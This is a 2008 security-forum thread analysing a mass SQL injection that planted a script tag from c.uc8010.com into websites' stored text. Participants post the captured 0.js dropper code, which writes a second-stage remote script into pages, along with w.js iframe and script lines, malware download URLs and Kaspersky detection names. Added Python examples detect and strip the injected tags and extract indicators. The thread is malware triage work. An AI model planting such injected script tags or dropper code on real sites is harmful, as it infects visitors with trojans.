vk3ukf
Cadet
Joined: Dec 11, 2004 Posts: 4 Location: Australia
Posted: Sat Jan 05, 2008 11:40 am Post subject: SQL attack, src=http://c.uc8010.com/0.js>
Hello, I would like to ask if anyone can advise or enlighten me a little more.
Currently, if you type "src=http://c.uc8010.com/0.js>" into Google, many references will come up.
It seems web pages on these sites have this code.
The site I have experienced recently had huge amounts of database text replaced with this string.
They have just apparently completed a system restore to a period of a week or two ago.
Below is what I could find out about it.
Hi, I have just discovered a social networking website I have been using with some unusual happenings.
Text and blogs being replaced with this,
src=http://c.uc8010.com/0.js>
The main URL only shows OK and a smile.
The full URL attempts to load a JavaScript file.
Below is the data I sent to the social networking site a few minutes ago.
-------------------------------------------
I have come across more information regarding the JavaScript,
It was first identified by the Chinese on Dec 31 2007, it appeared in a western reference a few days later.
It is an SQL attack. There are now thousands of infected sites, most commercial. It is more than likely coming in with ads and banners from these sites.
See these references for a little more information.
Original reference in Chinese.
http://www.itis.tw/malicious_url/2587
The same page above translated by Google.
http://translate.google.com/translate?hl=en&sl=zh-TW&u=http://www.itis.tw/malicious_url/2587&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dhttp://c.uc8010.com/0.js%253E%2Bvirus%26start%3D10%26hl%3Den%26sa%3DN
This may give some tech ideas as to elimination.
Translated from Chinese.
http://72.14.203.104/translate_c?hl=en&u=http://rogerspeaking.blogspot.com/2007/12/d-link.html&prev=/search%3Fq%3Dhttp://c.uc8010.com/0.js%253E%2Bvirus%26start%3D10%26hl%3Den%26sa%3DN
The reference mentioned for the first time in English.
http://www.sitepoint.com/forums/showthread.php?p=3672170
Also, you may continue to get re-infected from your ad feeds and infected users.
If anyone can comment further, please do.
Hoping this is of some assistance to anyone experiencing the same.
K.
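A scan for the injected fragment across stored content, added here as an example and not code from the poster or from the affected site: it flags both the complete `<script src=...>` tag and the bare `src=...0.js>` tail quoted above, and strips them so a cleanup pass can be run over a content table without a full restore. The indicator host list, the sample rows and the function names are assumptions for illustration. Cleaning the stored text does not close the injection route itself, so re-infection stays possible until that is fixed.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Hypothetical indicator list, constructed for this example: the host seen in the thread.
INJECTED_HOSTS = ("c.uc8010.com",)

# Complete injected tag, e.g. <script src=http://c.uc8010.com/0.js></script>
FULL_TAG = re.compile(
    r"<script\s+src=['\"]?https?://(?P<host>[^/'\">\s]+)[^>]*>\s*(?:</script>)?",
    re.IGNORECASE,
)
# Tail form as quoted in the thread, with the leading "<script" gone:
# src=http://c.uc8010.com/0.js>
RESIDUE = re.compile(r"src=['\"]?https?://(?P<host>[^/'\">\s]+)[^>]*>", re.IGNORECASE)


def find_injections(text: str) -> List[Tuple[str, str]]:
    """Return (form, matched_text) for every injected fragment in one stored field."""
    hits = []
    for m in FULL_TAG.finditer(text):
        if m.group("host").lower() in INJECTED_HOSTS:
            hits.append(("script-tag", m.group(0)))
    # Blank out complete tags first so the tail pattern does not count them twice.
    masked = FULL_TAG.sub(lambda m: " " * len(m.group(0)), text)
    for m in RESIDUE.finditer(masked):
        if m.group("host").lower() in INJECTED_HOSTS:
            hits.append(("residue", m.group(0)))
    return hits


def clean_field(text: str) -> str:
    """Strip fragments pointing at listed hosts; unrelated markup is left alone."""
    def drop_if_listed(m):
        return "" if m.group("host").lower() in INJECTED_HOSTS else m.group(0)
    text = FULL_TAG.sub(drop_if_listed, text)
    text = RESIDUE.sub(drop_if_listed, text)
    return text.rstrip()


def scan_rows(rows: Iterable[Tuple[int, str]]) -> Dict[int, List[Tuple[str, str]]]:
    """rows: (row id, text). Returns the affected ids with the fragments found."""
    report = {}
    for row_id, body in rows:
        hits = find_injections(body)
        if hits:
            report[row_id] = hits
    return report


# Constructed sample rows standing in for a dump of a blog/comments table.
SAMPLE_ROWS = [
    (1, "Welcome to my page, nothing unusual here."),
    (2, "Blog post body...<script src=http://c.uc8010.com/0.js></script>"),
    (3, "Twenty five lines of text ending with src=http://c.uc8010.com/0.js>"),
    (4, 'Legit embed <script src="https://example.org/app.js"></script>'),
]

if __name__ == "__main__":
    bodies = dict(SAMPLE_ROWS)
    for row_id, hits in scan_rows(SAMPLE_ROWS).items():
        print(row_id, hits)
        print("  cleaned:", clean_field(bodies[row_id]))
```

Run against a real export, the report gives the row ids to inspect and `clean_field` the replacement text; row 4 shows that a third-party script tag not on the indicator list is untouched.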
tetak
MIRT Team Lead, Premium Member
Joined: Jan 19, 2007 Posts: 5878
Posted: Sun Jan 06, 2008 6:11 pm
The site with the .js file on it seems to be down.
If you still have a sample of the malware, please add it to a zip file and upload it as an attachment to this post.
_________________
Got Windows XP? Help protect your PC from malware with Microsoft's anti-spyware program Windows Defender.
Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
MAPKOBKA
Lieutenant, Premium Member
Joined: Jul 04, 2007 Posts: 163
Posted: Sun Jan 06, 2008 8:56 pm
I sent it to Kaspersky, their reply was that "No malicious software was found in the attached file."
_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
vk3ukf
Cadet
Joined: Dec 11, 2004 Posts: 4 Location: Australia
Posted: Mon Jan 07, 2008 5:43 pm
Hello again, the main site is still active.
I typed the URL into my browser (IE) and it got diverted to some Windows Live Search page??? I hate that, stop trying to think for me.
I did it again, then I got it. I saved the .js file; below are the contents.
function setCookie(name,value)
{
    var Days = 1;
    var exp = new Date();
    // Despite the variable name, the live formula gives a 1-hour expiry; the trailing comment is the usual 24-hour version
    exp.setTime(exp.getTime() + Days*1*60*60*1000);//Days*24*60*60*1000;
    document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null)
    {
        // Marker cookie already present: do nothing on this visit
        return unescape(arr[2]);
    }
    else
    {
        // No marker yet: write a second-stage script tag into the page, then set the marker so this fires once per hour per browser
        document.writeln("<script src=http:\/\/c.uc8010.com\/0\/w.js><\/script>");
        // document.writeln("<iframe src=\"http:\/\/c.uc8010.com\/ip\/Cip.aspx\" width=\"20\" height=\"0\" scrolling=\"no\" frameborder=\"0\"><\/iframe>");
        setCookie("Lin","ok");
        return null;
    }
}
getCookie("
I do not understand Java; the site that had a great pile of blog text replaced was Yuwie, they seem to be OK at the moment.
Say I had written 25 lines of text and posted it, there would be 1 line, with src=http://c.uc8010.com/0.js> at the end.
K.
vk3ukf
Cadet
Joined: Dec 11, 2004 Posts: 4 Location: Australia
Posted: Mon Jan 07, 2008 5:49 pm Post subject: Added 0.js above but not zip oops, zip is attached to this
In the post above I tried to add the 0.js file, but didn't zip it; the zip is attached to this one.
tetak
MIRT Team Lead, Premium Member
Joined: Jan 19, 2007 Posts: 5878
Posted: Mon Jan 07, 2008 10:45 pm
Thanks for uploading the file.
Is anybody able to download either of these files?
Code:
http://c.uc8010.com/0/w.js
http://c.uc8010.com/ip/Cip.aspx
If you can, please add the files in a .zip file and upload them as an attachment to this post.
MAPKOBKA
Lieutenant, Premium Member
Joined: Jul 04, 2007 Posts: 163
Posted: Mon Jan 07, 2008 11:04 pm
(First link)
That link was dead the last time I checked; looks like there is a malicious script there now.
Tries to download
Opens iframes/scripts
Code:
document.writeln("<iframe src=hxxp:\/\/c.uc8010.com\/1.html width=1 height=0><\/iframe>");
document.writeln("<script src=\'hxxp:\/\/s106.cnzz.com\/stat.php?id=742266&web_id=742266\' language=\'JavaScript\' charset=\'gb2312\'><\/script>");
document.writeln("<script src=\'hxxp:\/\/c.uc8010.com\/0\/007.js\' language=\'JavaScript\'><\/script>");
hxxp://c.uc8010.com/0/1.exe and 19.exe
Also, one of the iframes leads to
hxxp://ftpgen2008.521066.com/aawowuiq/
where
Code:
<script src=06014.js></script>
<script src=real.js></script>
<script src=07055.js></script>
<script src=yahoo.js></script>
are downloaded.
Second link for me simply downloads "Hello" and nothing else.
I've just had a quick look round, there is probably a lot more than that.
I have zipped up the scripts/iframes/.exes and am attaching to this post.
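A small static triage helper, added here as an example rather than anything from the thread's analysts: it pulls the iframe and script sources out of `document.writeln(...)` strings in a dropper like 0.js or w.js, undoes the `\/` escaping, records whether the line is commented out, defangs the URLs for a report and collects the hosts for a blocklist. It also flags the cookie gate from 0.js, which makes the second stage fire only once per visitor for the cookie's lifetime, something a sandbox replay should account for. The two samples are constructed from the snippets quoted in the thread (the truncated `getCookie("` call is left out) and the function names are mine.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Constructed sample 1: the getCookie branch of 0.js as quoted in the thread.
SAMPLE_0_JS = r'''
function getCookie(name)
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null) { return unescape(arr[2]); }
    else {
        document.writeln("<script src=http:\/\/c.uc8010.com\/0\/w.js><\/script>");
        // document.writeln("<iframe src=\"http:\/\/c.uc8010.com\/ip\/Cip.aspx\" width=\"20\" height=\"0\"><\/iframe>");
        setCookie("Lin","ok");
        return null;
    }
}
'''

# Constructed sample 2: the w.js lines quoted above, already written with hxxp.
SAMPLE_W_JS = r'''
document.writeln("<iframe src=hxxp:\/\/c.uc8010.com\/1.html width=1 height=0><\/iframe>");
document.writeln("<script src=\'hxxp:\/\/s106.cnzz.com\/stat.php?id=742266&web_id=742266\' language=\'JavaScript\' charset=\'gb2312\'><\/script>");
document.writeln("<script src=\'hxxp:\/\/c.uc8010.com\/0\/007.js\' language=\'JavaScript\'><\/script>");
'''

# document.writeln("...") or document.writeln('...'), honouring backslash escapes inside the literal
WRITELN = re.compile(r"""document\.writeln\(\s*(?:"(?P<dq>(?:\\.|[^"\\])*)"|'(?P<sq>(?:\\.|[^'\\])*)')""")
# <script ... src=X> or <iframe ... src=X>, with or without quotes around X
TAG = re.compile(r"""<(?P<tag>script|iframe)\b[^>]*?\bsrc=["']?(?P<src>[^"'\s>]+)""", re.IGNORECASE)


def js_unescape(s: str) -> str:
    # Enough for these samples: \/ -> /, \" -> ", \' -> '
    return re.sub(r"\\(.)", r"\1", s)


def defang(url: str) -> str:
    return url.replace("http://", "hxxp://")


def extract_stage2(js: str) -> List[Dict]:
    """One record per <script>/<iframe> source written via document.writeln."""
    found = []
    for line in js.splitlines():
        commented = line.strip().startswith("//")
        for m in WRITELN.finditer(line):
            body = m.group("dq") if m.group("dq") is not None else m.group("sq")
            html = js_unescape(body)
            for t in TAG.finditer(html):
                url = t.group("src").replace("hxxp://", "http://")  # normalise analyst notation
                found.append({"tag": t.group("tag").lower(), "url": url,
                              "defanged": defang(url), "commented_out": commented})
    return found


def indicator_hosts(records: List[Dict]) -> Set[str]:
    """Hosts to feed into a proxy or DNS blocklist."""
    return {urlsplit(r["url"]).hostname for r in records}


def has_cookie_gate(js: str) -> bool:
    """True when the injection is conditioned on a cookie lookup, i.e. fires once per visitor."""
    return "document.cookie" in js and "document.writeln" in js


if __name__ == "__main__":
    for name, js in (("0.js", SAMPLE_0_JS), ("w.js", SAMPLE_W_JS)):
        print(name, "cookie gate:", has_cookie_gate(js))
        for rec in extract_stage2(js):
            flag = " (commented out)" if rec["commented_out"] else ""
            print("  ", rec["tag"], rec["defanged"] + flag)
    all_records = extract_stage2(SAMPLE_0_JS) + extract_stage2(SAMPLE_W_JS)
    print("hosts:", sorted(indicator_hosts(all_records)))
```

The commented-out Cip.aspx iframe is reported as well, marked as such, since a disabled line in one revision of a dropper often turns up live in the next; the per-line approach assumes each `document.writeln` call sits on a single line, which holds for the samples quoted in the thread.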
bctrainers
Cadet
Joined: Jan 08, 2008 Posts: 1 Location: USA
MAPKOBKA
Lieutenant, Premium Member
Joined: Jul 04, 2007 Posts: 163
Posted: Tue Jan 08, 2008 4:14 pm
Kaspersky have analysed those files and found the following:
06014.js_ - Trojan-Downloader.JS.Psyme.xn
07055.js_ - Trojan-Downloader.JS.Agent.ats,
load.exe_ - Trojan.Win32.Pakes.bxl,
real.js_ - Exploit.Win32.RealPlr.s,
w.js_ - Trojan-Downloader.JS.Agent.auk,
yahoo.js_ - Trojan-Downloader.JS.Agent.atr
tetak
MIRT Team Lead, Premium Member
Joined: Jan 19, 2007 Posts: 5878
Amrodg
Cadet
Joined: Jan 11, 2008 Posts: 2 Location: USA
Posted: Fri Jan 11, 2008 1:03 am
When the JavaScript is run from a website it also downloads hxxp://www.worldofwarcraftn.com/1.exe. The website is down now, but I have a copy of the file. Should I zip it up and attach it?
Amrodg
tetak
MIRT Team Lead, Premium Member
Joined: Jan 19, 2007 Posts: 5878
Posted: Sun Jan 13, 2008 4:33 pm
I was able to download 1.exe from the site but it doesn't appear to contain any malware.
Just in case I have a different version, could you add the file to a .zip file and upload it as an attachment to this post?
Amrodg
Cadet
Joined: Jan 11, 2008 Posts: 2 Location: USA
Posted: Tue Jan 15, 2008 12:38 pm
Attached the 1.exe. When it is run it places the dll that is included in the zip file into the Windows directory.
tetak
MIRT Team Lead, Premium Member
Joined: Jan 19, 2007 Posts: 5878
Posted: Thu Jan 17, 2008 11:02 pm
Thanks for uploading the files, they are both well detected so I didn't add them to the malware listserv.